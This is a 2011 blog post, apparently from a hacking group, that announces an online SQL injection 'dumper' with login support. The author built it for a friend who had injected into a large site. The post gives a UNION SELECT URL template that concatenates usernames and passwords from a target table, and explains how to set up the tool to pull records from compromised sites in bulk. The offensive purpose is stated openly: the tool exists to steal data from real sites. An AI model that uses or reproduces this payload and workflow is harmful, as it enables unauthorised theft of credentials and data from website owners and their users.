Friday, May 6, 2011

Fastest Online SQL Injection Dumper with Login Support

Hello everyone ,

My friend Jackh4x0r requested me to make a dumper which has Login support, because he injected into a biggie site and want to dump huge values from it (which is related to (can't disclose)).So when he wanted to dump the problem arised.


1) we need to Login to the site
2) Group_concat works but only small amount of values.
3) Concat with limit + takes lots of time to dump
4) My old Dumper without login support wont help in this case.


So for the above reasons i made this New Dumper with login support. :) Again it is Fastest

How does it work

Go to Dumper with Login

Now in the First Field Enter Complete SQLI URL Enter the URL like this
http://www.somsite.com/prod.php?id=1+and+1=2+union+select+1,
concat(0x7375626861736864617379616d2e636f6d,username,0x3a,password,
0x7375626861736864617379616d2e636f6d)+from+some_table+limit+


The Bold values above are Required to dump which should be common for every site.

Well Dont forget at the end of the URL it should be always limit+

Now in Second Field That is Referrer Enter the Referrer URL ( it is optional )

Now in the Third Field That is Login URL : Enter the URL where the Login is defined (see the source and find the
<form action="LOGIN_URL_HERE" method="post">

Now Data Field


See the Source of the Login Page Now find the Input Values names let us suppose we the input fields like this

<form action="login.php" method="post">
<input type="text" name="user" />
<input type="password" name="pass" / >
<input type="submit" name="submit" value="login"/>
</form>

in the above form the Bold Values are important

Now in login url specify the Login URL in the above case it is

http://somesite.com/some_folder/login.php


The Data Field should have like this

user=YOUR_USERNAME_TO_THE_SITE&
pass=YOUR_PASSWORD_TO_THE_SITE&
submit=login


Start Count and End count From where you want to start and till where you want to end

Now Happy Dumping


Got question read from above again still got question contact me at luk@inbox.com

Got any feature request Contact me same :)



PS: Yea i made it fastest too :) same as old Dumper :)


PS: Greetz to root4o,Dalsim,Exidous,Thor,Smith,Jackh4x0r,Danzel,Killers and to all my ZH Community

3 comments for "Fastest Online SQL Injection Dumper with Login Support"

  1. Nice , but it's easy to log all dumped data and i would never use it.

    ReplyDelete
  2. its not working dude...

    ReplyDelete
  3. @ 2nd Anonymous
    It is working perfect i just checked may be u making syntaxes wrong

    @1st Anonymous
    I never asked you to Use it :) if you don't trust leave thank you

    ReplyDelete

background